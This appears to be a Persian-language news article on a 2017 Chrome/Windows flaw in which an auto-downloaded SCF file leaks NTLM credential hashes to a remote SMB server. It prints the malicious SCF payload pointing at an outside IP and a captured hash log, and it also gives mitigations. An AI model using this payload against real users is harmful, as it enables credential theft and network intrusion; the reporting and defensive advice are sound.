کروم

یک محقق امنیتی یک آسیب‌پذیری جدی را در تنظیمات پیش‌فرض آخرین نسخه از مرورگر گوگل کروم که بر روی تمامی نسخه‌های سیستم‌عامل ویندوز شامل ویندوز ۱۰ قابل اجرا شدن است، کشف کرده است که می‌تواند به یک مهاجم از راه دور اجازه دهد تا نام کاربری و کلمه عبور کاربر را بدزدد.

نام محققی که این آسیب‌پذیری را کشف کرده است، Bosko Stankovic از شرکت DefenseCode است[۱]. این آسیب‌پذیری این‌گونه عمل می‌کند که مشاهده یک وب‌سایت شامل یک فایل SFC مخرب، می‌تواند به قربانیان اجازه دهد تا به بدون آگاهی داشتن، اطلاعات ضروری مرتبط با ورود به کامپیوتر شخصی خود را با مهاجمان از طریق گوگل کروم و پروتکل SMB به اشتراک گذارند.

این روش جدید نیست و توسط Stuxnet (یک بدافزار قوی که به‌طور خاص طراحی شده بود تا فرآیند صلح‌آمیز هسته‌ای کشور ایران را نابود کند.) مورد بهره‌برداری قرار گرفته بود[۲] و از فایل‌های LNK که نوعی میانبر در ویندوز هستند استفاده می‌کرد و سیستم‌ها را در معرض خطر قرار می‌داد.

چیزی که این حمله را نسبت به دیگر حملات متمایز می‌کند این حقیقت است که چنین حملات احراز هویت SMB برای اولین بار در گوگل کروم مورد استفاده قرار گرفت.

کروم + SCF + SMB = دزدیده شدن اطلاعات حساس ورود کاربر به ویندوز

فرمت فایل میانبر SFC یا همان پوسته فرمان فایل(۱) مشابه فایل‌های LNK عمل می‌کند و به‌گونه‌ای طراحی شده است تا مجموعه‌ای محدود از دستورات ویندوز اکسپلورر را پشتیبانی کند که به تعریف کردن یک آیکون (مانند آیکون My Computer یا Recycle Bin) در صفحه دسکتاپ شما کمک می‌کند.

Stankovic در یک وبلاگ این‌گونه این عیب را توضیح می‌دهد: “در حال حاضر، یک مهاجم فقط به این نیاز دارد که قربانی (که دارای گوگل کروم و ویندوز کاملاً به‌روز شده است) را گول بزند تا از وب‌سایت مربوط به مهاجم بازدید کند تا از این طریق مهاجم بتواند اطلاعات کاربری او را بدزدد.”

اساساً، لینک‌های میان‌بر بر روی دسکتاپ شما یک فایل متنی هستند  با یک ترکیب خاص از کد پوسته(۱) که محل قرارگیری آیکون، نام برنامه و محل برنامه در آن مشخص شده است.

[Shell]
Command=2
IconFile=explorer.exe,3

ازآنجاکه کروم به فایل‌های SCF ویندوز اعتماد دارد، مهاجمان می‌توانند قربانیان را گول بزنند تا وب‌سایت آن‌ها را که شامل یک فایل میان‌بر دستکاری شده مخرب است، بازدید کنند که این فایل به‌صورت خودکار بر روی سیستم مورد هدف و بدون گرفتن تأییدیه از کاربر دانلود می‌شود.

به‌محض اینکه کاربر فولدری را که حاوی فایل دانلود شده است باز می‌کند بلافاصله و یا بعداً این فایل به‌صورت خودکار اجرا می‌شود تا یک آیکون را بدون اینکه کاربر بر روی آن کلیک کند، بازیابی کند.

اما به‌جای آنکه محل تصویر یک آیکون تنظیم شود، فایل SCF مخرب توسط مهاجم و شامل محل سرور SMB از راه دور ساخته می‌شود.

[Shell]
IconFile=\\170.170.170.170\icon

بنابراین، به‌محض اینکه فایل SCF تلاش می‌کند تا تصویر آیکون موردنظر را بازیابی کند، به‌گونه‌ای گول می‌خورد تا یک احراز هویت خودکار را بسازد که توسط سرور از راه دور مهاجم بر روی پروتکل SMB کنترل می‌شود که از این طریق نام کاربری و کلمه عبور درهم کاربر را تحویل می‌دهد و به مهاجم اجازه می‌دهد تا از این اطلاعات استفاده کند و به کامپیوتر شخصی شما و یا شبکه شما وارد شود.

Stankovic می‌گوید: “قرار دادن محل یک آیکون در یک سرور SMB از راه دور یک شاخص حمله شناخته شده است که از ویژگی احراز هویت خودکار ویندوز سوءاستفاده می‌کند در هنگامی‌که به سرویس‌هایی مانند اشتراک‌گذاری فایل از راه دور دسترسی داشته باشد.”

اما پس از حملات Stuxnet مایکروسافت فایل‌های LNK را مجبور کرد تا آیکون‌های خود را فقط از منابع داخلی بارگذاری کنند بنابراین آن‌ها دیگر نسبت به چنین حملاتی آسیب‌پذیر نبودند که آن‌ها را مجبور به بارگذاری یک کد مخرب از سرور‌های بیرونی می‌کرد.

بااین‌حال، فایل‌های SCF رهاشده باقی ماندند.

بهره‌برداری از احراز هویت هشِ LM/NTLM از طریق فایل SCF

NTLM

اما سؤال اینجاست که چرا سیستم‌عامل ویندوز کامپیوتر شخصی شما، اطلاعات کاربری شما را به یک سرور تقدیم می‌کند؟

این روشی است که احراز هویت از طریق پروتکل SMB یا مسدود کردن پیام سرور(۳) به همراه مکانیزم احراز هویت پاسخ/چالش NTLM کار می‌کند.

به‌طور خلاصه، احراز هویت LM/NTLM در چهار مرحله کار می‌کند:

  • کاربران ویندوز تلاش می‌کنند تا وارد یک سرور شوند.
  • سرور مربوطه با یک مقدارِ چالش پاسخ می‌دهد و از کاربر درخواست می‌کند تا مقدار چالش را توسط کلمه عبور هشِ خود رمزنگاری کند و آن را بازگرداند.
  • ویندوز درخواست SCF را با فرستادن نام کاربری مشتری و نسخه هش(۴) شده کلمه عبور او به سرور پاسخ می‌دهد.
  • در مرحله بعد سرور پاسخ مربوطه را گرفته و اگر کلمه عبور هش شده کاربر صحیح باشد، احراز هویت را تأیید می‌کند.

حال در سناریوی حمله SCF، که توسط Stankovic به‌دقت توضیح داده شده است، مطابق مرحله سوم که در بالا توضیح داده شد، ویندوز تلاش خواهد کرد تا به‌صورت خودکار به یک سرور SMB مخرب از طریق فراهم کردن نام کاربری و کلمه عبور هش شده NTLMv2 پاسخ دهد.

اگر کاربر زیرمجموعه‌ای از یک شبکه متعلق به یک شرکت بزرگ باشد، اطلاعات تخصیص شده به کاربر برای ورود به این شبکه توسط مدیر شبکه این شرکت، برای مهاجم فرستاده خواهد شد.

اگر قربانی یک کاربر خانگی باشد، نام کاربری و کلمه عبور کاربر برای ورود به ویندوز برای مهاجم ارسال خواهد شد.

[*] SMB Captured – 2017-05-15 13:10:44 +0200
NTLMv2 Response Captured from 173.203.29.182:62521 – 173.203.29.182
USER:Bosko DOMAIN:Master OS: LM:
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:98daf39c3a253bbe4a289e7a746d4b24
NT_CLIENT_CHALLENGE:01010000000000000e5f83e06fcdd201ccf26d91cd9e326e00

Bosko::Master:1122334455667788:98daf39c3a253bbe4a289e7a746d4b24:01010000
e5f83e06fcdd201ccf26d91cd9e326e00000000020000000000000000000000

بدون شک اطلاعات ارسال‌شده به‌صورت رمزنگاری‌شده هستند اما می‌توانند در آینده brute-forced شده تا کلمات عبور را بازیابی کنند.

این محقق می‌گوید: “این نکته قابل توجه است که فایل‌های SCF در ویندوز اکسپلورر بدون پسوند ظاهر می‌شوند  و بدون در نظر گرفتن تنظیمات مربوط به فایل و فولدرها در ویندوز. بنابراین، نام picture.jpg.scf در ویندوز اکسپلورر به‌صورت picture.jpg نمایش داده می‌شود. به همین علت است که ماهیت حملات استفاده از فایل‌های SCF همیشه مخفی می‌ماند.”

گاهی اوقات نیاز به رمزگشایی کردن از کلمه عبور نیز نخواهد بود.

ازآنجایی‌که تعدادی از سرویس‌های مایکروسافت کلمات عبور را در فرمت هش نیز قبول می‌کنند، مهاجم مربوطه حتی می‌تواند از کلمات عبور رمزنگاری‌شده برای ورود به سرویس‌هایی مانند OnrDrive، Outlook.com، Office 365، Office Online، Skype، Xbox Live و دیگر سرویس‌های مایکروسافت که دارای این ویژگی هستند، استفاده کند.

چنین آسیب‌پذیری‌هایی، بر طبق گفته این محقق، می‌تواند باعث به وجود آمدن تهدیدات جدی نسبت به سازمان‌های بزرگ شود. این آسیب‌پذیری‌ها مهاجمان را قادر می‌سازد تا یکی از اعضای آن‌ها را جعل هویت کرده و به مهاجم اجازه می‌دهد تا بلافاصله از امتیازات به دست آورده دوباره استفاده کند تا سطح دسترسی را افزایش داده و بر روی منابع IT سازمان موردنظر دسترسی و کنترل داشته باشد و نسبت به دیگر اعضا نیز حملاتی را انجام دهد.

نحوه مقابله با حملات مرتبط با احراز هویت SMB

خیلی ساده، ارتباطات خروجی SMB (پورت‌های TCP شامل ۱۳۹ و ۴۴۵) را از شبکه داخلی به یک WAN از طریق فایروال مسدود کنید، بنابراین کامپیوترهای داخلی نمی‌توانند با سرور‌های SMB راه دور ارتباط داشته باشند.

Stankovic همچنین به کاربران پیشنهاد داده است تا گزینه غیرفعال کردن دانلود خودکار را در گوگل کروم به روش زیر مدنظر قرار دهند:

Settings → Show advanced settings → and then Check the “Ask where to save each file before downloading

این تغییرات به شما اجازه می‌دهد تا به‌صورت دستی هر تلاش برای دانلودی را از طریق گوگل کروم تأیید کنید، که به‌طور قابل‌توجهی خطر این‌گونه حملات را کاهش می‌دهد.

گوگل از این آسیب‌پذیری آگاه است و گفته است که در حال کاربر روی ارائه وصله مناسب برای آن است، اما زمانی برای ارائه آن تعیین نکرده است.

منابع

[۱] http://defensecode.com/news_article.php?id=21

[۲] http://thehackernews.com/2015/02/hard-drive-firmware-hacking.html

[۳] http://thehackernews.com/2017/05/chrome-windows-password-hacking.html


(۱) Shell Command File
(۲) specific syntax of shell code
(۳) Server Message Block
(۴) Hash